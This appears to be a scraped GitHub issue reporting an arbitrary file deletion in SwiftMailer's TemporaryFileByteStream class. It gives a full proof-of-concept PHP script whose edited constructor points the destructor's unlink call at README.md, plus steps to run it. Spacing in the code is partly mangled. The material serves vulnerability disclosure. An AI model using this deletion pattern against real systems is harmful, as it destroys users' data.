You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
add it's all parent classes and other implements
In the end, add the code
$a=newSwift_ByteStream_TemporaryFileByteStream();
and run a cmd php poc.php
README.md will be remove poc.php
<?phpinterface Swift_OutputByteStream
{
/** * Reads $length bytes from the stream into a string and moves the pointer * through the stream by $length. * * If less bytes exist than are requested the remaining bytes are given instead. * If no bytes are remaining at all, boolean false is returned. * * @param int $length * * @return string|bool * * @throws Swift_IoException */publicfunctionread($length);
/** * Move the internal read pointer to $byteOffset in the stream. * * @param int $byteOffset * * @return bool * * @throws Swift_IoException */publicfunctionsetReadPointer($byteOffset);
}
interface Swift_FileStream extends Swift_OutputByteStream
{
/** * Get the complete path to the file. * * @return string */publicfunctiongetPath();
}
interface Swift_Filterable
{
/** * Add a new StreamFilter, referenced by $key. * * @param Swift_StreamFilter $filter * @param string $key */publicfunctionaddFilter(Swift_StreamFilter$filter, $key);
/** * Remove an existing filter using $key. * * @param string $key */publicfunctionremoveFilter($key);
}
interface Swift_InputByteStream
{
/** * Writes $bytes to the end of the stream. * * Writing may not happen immediately if the stream chooses to buffer. If * you want to write these bytes with immediate effect, call {@link commit()} * after calling write(). * * This method returns the sequence ID of the write (i.e. 1 for first, 2 for * second, etc etc). * * @param string $bytes * * @return int * * @throws Swift_IoException */publicfunctionwrite($bytes);
/** * For any bytes that are currently buffered inside the stream, force them * off the buffer. * * @throws Swift_IoException */publicfunctioncommit();
/** * Attach $is to this stream. * * The stream acts as an observer, receiving all data that is written. * All {@link write()} and {@link flushBuffers()} operations will be mirrored. * * @param Swift_InputByteStream $is */publicfunctionbind(Swift_InputByteStream$is);
/** * Remove an already bound stream. * * If $is is not bound, no errors will be raised. * If the stream currently has any buffered data it will be written to $is * before unbinding occurs. * * @param Swift_InputByteStream $is */publicfunctionunbind(Swift_InputByteStream$is);
/** * Flush the contents of the stream (empty it) and set the internal pointer * to the beginning. * * @throws Swift_IoException */publicfunctionflushBuffers();
}
abstractclass Swift_ByteStream_AbstractFilterableInputStream implements Swift_InputByteStream, Swift_Filterable
{
/** * Write sequence. */protected$_sequence = 0;
/** * StreamFilters. */private$_filters = array();
/** * A buffer for writing. */private$_writeBuffer = '';
/** * Bound streams. * * @var Swift_InputByteStream[] */private$_mirrors = array();
/** * Commit the given bytes to the storage medium immediately. * * @param string $bytes */abstractprotectedfunction_commit($bytes);
/** * Flush any buffers/content with immediate effect. */abstractprotectedfunction_flush();
/** * Add a StreamFilter to this InputByteStream. * * @param Swift_StreamFilter $filter * @param string $key */publicfunctionaddFilter(Swift_StreamFilter$filter, $key)
{
$this->_filters[$key] = $filter;
}
/** * Remove an already present StreamFilter based on its $key. * * @param string $key */publicfunctionremoveFilter($key)
{
unset($this->_filters[$key]);
}
/** * Writes $bytes to the end of the stream. * * @param string $bytes * * @return int * * @throws Swift_IoException */publicfunctionwrite($bytes)
{
$this->_writeBuffer .= $bytes;
foreach ($this->_filtersas$filter) {
if ($filter->shouldBuffer($this->_writeBuffer)) {
return;
}
}
$this->_doWrite($this->_writeBuffer);
return ++$this->_sequence;
}
/** * For any bytes that are currently buffered inside the stream, force them * off the buffer. * * @throws Swift_IoException */publicfunctioncommit()
{
$this->_doWrite($this->_writeBuffer);
}
/** * Attach $is to this stream. * * The stream acts as an observer, receiving all data that is written. * All {@link write()} and {@link flushBuffers()} operations will be mirrored. * * @param Swift_InputByteStream $is */publicfunctionbind(Swift_InputByteStream$is)
{
$this->_mirrors[] = $is;
}
/** * Remove an already bound stream. * * If $is is not bound, no errors will be raised. * If the stream currently has any buffered data it will be written to $is * before unbinding occurs. * * @param Swift_InputByteStream $is */publicfunctionunbind(Swift_InputByteStream$is)
{
foreach ($this->_mirrorsas$k => $stream) {
if ($is === $stream) {
if ($this->_writeBuffer !== '') {
$stream->write($this->_writeBuffer);
}
unset($this->_mirrors[$k]);
}
}
}
/** * Flush the contents of the stream (empty it) and set the internal pointer * to the beginning. * * @throws Swift_IoException */publicfunctionflushBuffers()
{
if ($this->_writeBuffer !== '') {
$this->_doWrite($this->_writeBuffer);
}
$this->_flush();
foreach ($this->_mirrorsas$stream) {
$stream->flushBuffers();
}
}
/** Run $bytes through all filters */privatefunction_filter($bytes)
{
foreach ($this->_filtersas$filter) {
$bytes = $filter->filter($bytes);
}
return$bytes;
}
/** Just write the bytes to the stream */privatefunction_doWrite($bytes)
{
$this->_commit($this->_filter($bytes));
foreach ($this->_mirrorsas$stream) {
$stream->write($bytes);
}
$this->_writeBuffer = '';
}
}
class Swift_ByteStream_FileByteStream extends Swift_ByteStream_AbstractFilterableInputStream implements Swift_FileStream
{
/** The internal pointer offset */private$_offset = 0;
/** The path to the file */private$_path;
/** The mode this file is opened in for writing */private$_mode;
/** A lazy-loaded resource handle for reading the file */private$_reader;
/** A lazy-loaded resource handle for writing the file */private$_writer;
/** If magic_quotes_runtime is on, this will be true */private$_quotes = false;
/** If stream is seekable true/false, or null if not known */private$_seekable = null;
/** * Create a new FileByteStream for $path. * * @param string $path * @param bool $writable if true */publicfunction__construct($path, $writable = false)
{
if (empty($path)) {
thrownewSwift_IoException('The path cannot be empty');
}
$this->_path = $path;
$this->_mode = $writable ? 'w+b' : 'rb';
if (function_exists('get_magic_quotes_runtime') && @get_magic_quotes_runtime() == 1) {
$this->_quotes = true;
}
}
/** * Get the complete path to the file. * * @return string */publicfunctiongetPath()
{
return$this->_path;
}
/** * Reads $length bytes from the stream into a string and moves the pointer * through the stream by $length. * * If less bytes exist than are requested the * remaining bytes are given instead. If no bytes are remaining at all, boolean * false is returned. * * @param int $length * * @return string|bool * * @throws Swift_IoException */publicfunctionread($length)
{
$fp = $this->_getReadHandle();
if (!feof($fp)) {
if ($this->_quotes) {
ini_set('magic_quotes_runtime', 0);
}
$bytes = fread($fp, $length);
if ($this->_quotes) {
ini_set('magic_quotes_runtime', 1);
}
$this->_offset = ftell($fp);
// If we read one byte after reaching the end of the file// feof() will return false and an empty string is returnedif ($bytes === '' && feof($fp)) {
$this->_resetReadHandle();
returnfalse;
}
return$bytes;
}
$this->_resetReadHandle();
returnfalse;
}
/** * Move the internal read pointer to $byteOffset in the stream. * * @param int $byteOffset * * @return bool */publicfunctionsetReadPointer($byteOffset)
{
if (isset($this->_reader)) {
$this->_seekReadStreamToPosition($byteOffset);
}
$this->_offset = $byteOffset;
}
/** Just write the bytes to the file */protectedfunction_commit($bytes)
{
fwrite($this->_getWriteHandle(), $bytes);
$this->_resetReadHandle();
}
/** Not used */protectedfunction_flush()
{
}
/** Get the resource for reading */privatefunction_getReadHandle()
{
if (!isset($this->_reader)) {
if (!$this->_reader = fopen($this->_path, 'rb')) {
thrownewSwift_IoException(
'Unable to open file for reading ['.$this->_path.']'
);
}
if ($this->_offset != 0) {
$this->_getReadStreamSeekableStatus();
$this->_seekReadStreamToPosition($this->_offset);
}
}
return$this->_reader;
}
/** Get the resource for writing */privatefunction_getWriteHandle()
{
if (!isset($this->_writer)) {
if (!$this->_writer = fopen($this->_path, $this->_mode)) {
thrownewSwift_IoException(
'Unable to open file for writing ['.$this->_path.']'
);
}
}
return$this->_writer;
}
/** Force a reload of the resource for reading */privatefunction_resetReadHandle()
{
if (isset($this->_reader)) {
fclose($this->_reader);
$this->_reader = null;
}
}
/** Check if ReadOnly Stream is seekable */privatefunction_getReadStreamSeekableStatus()
{
$metas = stream_get_meta_data($this->_reader);
$this->_seekable = $metas['seekable'];
}
/** Streams in a readOnly stream ensuring copy if needed */privatefunction_seekReadStreamToPosition($offset)
{
if ($this->_seekable === null) {
$this->_getReadStreamSeekableStatus();
}
if ($this->_seekable === false) {
$currentPos = ftell($this->_reader);
if ($currentPos<$offset) {
$toDiscard = $offset-$currentPos;
fread($this->_reader, $toDiscard);
return;
}
$this->_copyReadStream();
}
fseek($this->_reader, $offset, SEEK_SET);
}
/** Copy a readOnly Stream to ensure seekability */privatefunction_copyReadStream()
{
if ($tmpFile = fopen('php://temp/maxmemory:4096', 'w+b')) {
/* We have opened a php:// Stream Should work without problem */
} elseif (function_exists('sys_get_temp_dir') && is_writable(sys_get_temp_dir()) && ($tmpFile = tmpfile())) {
/* We have opened a tmpfile */
} else {
thrownewSwift_IoException('Unable to copy the file to make it seekable, sys_temp_dir is not writable, php://memory not available');
}
$currentPos = ftell($this->_reader);
fclose($this->_reader);
$source = fopen($this->_path, 'rb');
if (!$source) {
thrownewSwift_IoException('Unable to open file for copying ['.$this->_path.']');
}
fseek($tmpFile, 0, SEEK_SET);
while (!feof($source)) {
fwrite($tmpFile, fread($source, 4096));
}
fseek($tmpFile, $currentPos, SEEK_SET);
fclose($source);
$this->_reader = $tmpFile;
}
}
class Swift_ByteStream_TemporaryFileByteStream extends Swift_ByteStream_FileByteStream
{
publicfunction__construct()
{
$filePath = tempnam(sys_get_temp_dir(), 'FileByteStream');
if ($filePath === false) {
thrownewSwift_IoException('Failed to retrieve temporary file name.');
}
parent::__construct("./README.md", true);
}
publicfunction__destruct()
{
if (file_exists($this->getPath())) {
@unlink($this->getPath());
}
}
}
$a=newSwift_ByteStream_TemporaryFileByteStream();
The text was updated successfully, but these errors were encountered:
Vulnerable path /vendor/swiftmailer/lib/classes/Swift/ByteStream/TemporaryFileByteStream.php
Vulnerable Codes
Line 36 of the "TemporaryFileByteStream.php" use the unlink function
Vulnerability exploitation process
copy TemporaryFileByteStream.php as poc.php
modify the
__construct()ofSwift_ByteStream_TemporaryFileByteStreamadd it's all parent classes and other implements
In the end, add the code
and run a cmd
php poc.phpREADME.md will be remove
poc.php
The text was updated successfully, but these errors were encountered: